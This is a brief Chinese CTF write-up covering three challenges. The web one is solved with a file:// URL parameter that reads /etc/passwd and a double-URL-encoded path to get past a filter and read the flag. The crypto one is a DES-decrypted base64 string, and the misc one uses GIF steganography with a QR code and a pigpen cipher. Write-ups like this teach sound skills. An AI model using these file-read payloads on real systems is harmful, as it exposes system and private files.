Web
old
拿到题目F12 发现了这个
感觉会有任意文件读取
尝试随机读取一个文件,构造payload:
/openStream?url=file:///etc/passwd
真读取到了文件
一般flag都在根目录,所以试一下
/openStream?url=file:///flag.txt
没有反应,随即去url编码再试一下
/openStream?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%34%25%37%38%25%37%34
拿到了flag.txt
CRY
这是道签到题
改一下后缀.zip
拿到一张jpg图片
利用.txt
打开看看有没有藏东西
发现了疑似base64的字符串
T x n a V r v 9 n T i X l F a E D 3 K 3 4 o Y r C r y k 4 s G K 9 / 3 o q a D Z / C R n z K x n A 5 J d g Q = =
考虑位DES加密 丢进网站解密
http://tool.chacuo.net/cryptdes
最后一行发现密码
解密成功
MISC
小猪的家
先用010看 发现是gif图
然后分帧 用stegsolve看0通道
得到二维码片段
用ps分别将其拼接
得到完整的二维码
扫描一下获取了base32加密的字符串
解密得到
再次进行base64解密
得到3faf86140
将pig.gif 改成pig.zip
密码输入进去得到
是猪圈
直接解码
将flag整理一下
flag{this_isa_pigpen_fake_flag}